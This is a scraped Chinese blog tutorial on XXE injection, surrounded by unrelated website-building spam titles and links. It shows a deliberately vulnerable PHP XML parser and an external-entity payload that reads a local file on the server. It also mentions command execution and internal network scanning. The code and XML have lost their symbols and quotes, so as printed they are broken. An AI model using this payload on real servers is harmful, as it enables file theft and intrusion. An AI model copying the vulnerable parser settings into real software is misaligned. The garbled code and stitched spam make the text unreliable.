当前位置: 首页 > news >正文

网站建设是怎么收费的vps 内存影响 网站

网站建设是怎么收费的,vps 内存影响 网站,网站开发课题开发背景,动易网站后台管理功能简介 XXE (XML External Entity Injection) 漏洞发生在应用程序解析 XML 输入时#xff0c;没有禁止外部实体的加载。 简单的理解#xff0c;一个实体就是一个变量#xff0c;可以在文档中的其他位置引用该变量。 实体主要分为四种#xff1a; 内置实体 (Built-in entities…简介 XXE (XML External Entity Injection) 漏洞发生在应用程序解析 XML 输入时没有禁止外部实体的加载。 简单的理解一个实体就是一个变量可以在文档中的其他位置引用该变量。 实体主要分为四种 内置实体 (Built-in entities)字符实体 (Character entities)通用实体 (General entities)参数实体 (Parameter entities)完整的介绍可以参考   DTD - Entities 到此网站学习一下  http://www.w3school.com.cn/dtd/                http://www.w3school.com.cn/xml              http://www.w3school.com.cn/xml              http://hublog.hubmed.org/archives/001854.html              https://www.tutorialspoint.com/dtd/dtd_entities.htm              http://blog.leanote.com/post/xuxi/XXE%E6%80%BB%E7%BB%93  //XXE总结              https://security.tencent.com/index.php/blog/msg/69             http://www.freebuf.com/articles/web/97833.html   危害 对于 XXE 的危害主要有 窃取敏感数据 (extracting sensitive data).远程代码执行 (remote code execution).攻击者可以实现任意文件读取,DOS拒绝服务攻击以及代理扫描内网等.  举例 服务器上面有一个xxeInject.php存在一个注入的文件正常访问。 文件内容 ?php #关闭Warning error_reporting(E_ALL^E_NOTICE^E_WARNING);#加载xml文件不懂php://input 参考下面链接 #http://taoshi.blog.51cto.com/1724747/1165499 $xmlfile file_get_contents(php://input); $dom new DOMDocument();# LIBXML_NOENT: 将 XML 中的实体引用 替换 成对应的值 # LIBXML_DTDLOAD: 加载 DOCTYPE 中的 DTD 文件 $dom-loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);$creds simplexml_import_dom($dom); $user $creds-user; $pass $creds-pass;echo Hello DaLao: . br . $user; ? 存在一个POSTXXE注入所以我们构造代码进行注入因为是测试我新建了一个文件如C://pass.txt内容ONDragonPassword,我们就利用这个漏洞进行此文件的读取。构造代码 ?xml version1.0 encodingUTF-8? !DOCTYPE ONDragon [ !ELEMENT ONDragon ANY !ENTITY xxe SYSTEM file:///C://pass.txt ] credsuserxxe;/userpassONDragon/pass /creds 我们打开火狐的Live Http这个小插件进行POST数据注入。   把我们的POST数据包复制上去然后Replay就可以获取C://pass.txt内容ONDragonPassword啦。 可以看到利用它可以查看服务器上的文件。命令执行得需要服务器有一个expect扩展插件如果按照此插件就可以进行远程命令执行。此外还可以进行类似SSRF的攻击内网信息收集端口扫描等等。转载于:https://www.cnblogs.com/DeeLMind/p/6897967.html
http://www.pierceye.com/news/465879/

相关文章:

  • 企业网站搭建项目概述范文wordpress更改链接地址
  • 免费网站在线观看人数在哪直播建设工业网站首页
  • 权威的南昌网站设计wordpress游客评论游客
  • 乡镇府建设网站什么是外链
  • 营销型网站设计流程电子商务网站建设软件
  • 做个人网站的步骤wordpress 添加新页面
  • 公司建网站流程网站布局选择
  • 云南效果好的网站优化微信如何做有趣的短视频网站
  • wordpress个人网站后台登陆dedecms仿站
  • 网站没被收录什么原因上海哪家做网站
  • 电子商务网站建设含代码项目外包是什么意思
  • 此网站正在建设中页面重庆网上商城网站建设公司
  • 保定建设公司网站新产品上市的营销策划方案
  • 网站建设课程报告论文网络设计专业有前途吗
  • 苏州哪个公司做门户网站wordpress显示评论者地理位置 浏览器
  • 福州网站设计十年乐云seo推广网上国网有什么好处
  • 豪华网站建设wordpress推广提成
  • 网站优化外包价格搜索引擎费用
  • 网站建设基本范例sqlite开发网站
  • 网站建设顾问站建开发外包公司
  • 建立网站花钱吗wordpress表结构写入不全
  • 绿色家园网站怎么做导出wordpress文章
  • 合肥有什么好的网站建设公司网站建设的售后服务流程
  • 做网站烧钱吗济南免费建站
  • ps个人主页网页设计模板汕头关键词优化服务
  • 网站建设功能图网站开发新技术探索
  • 做自行车网站应该注意什么个人介绍网页设计模板
  • 邢台网站建设免费做网站排名上海开发app
  • 沈阳网站建设设计企业网站设计与管理系统
  • 婚纱照网站制作梁山网站建设价格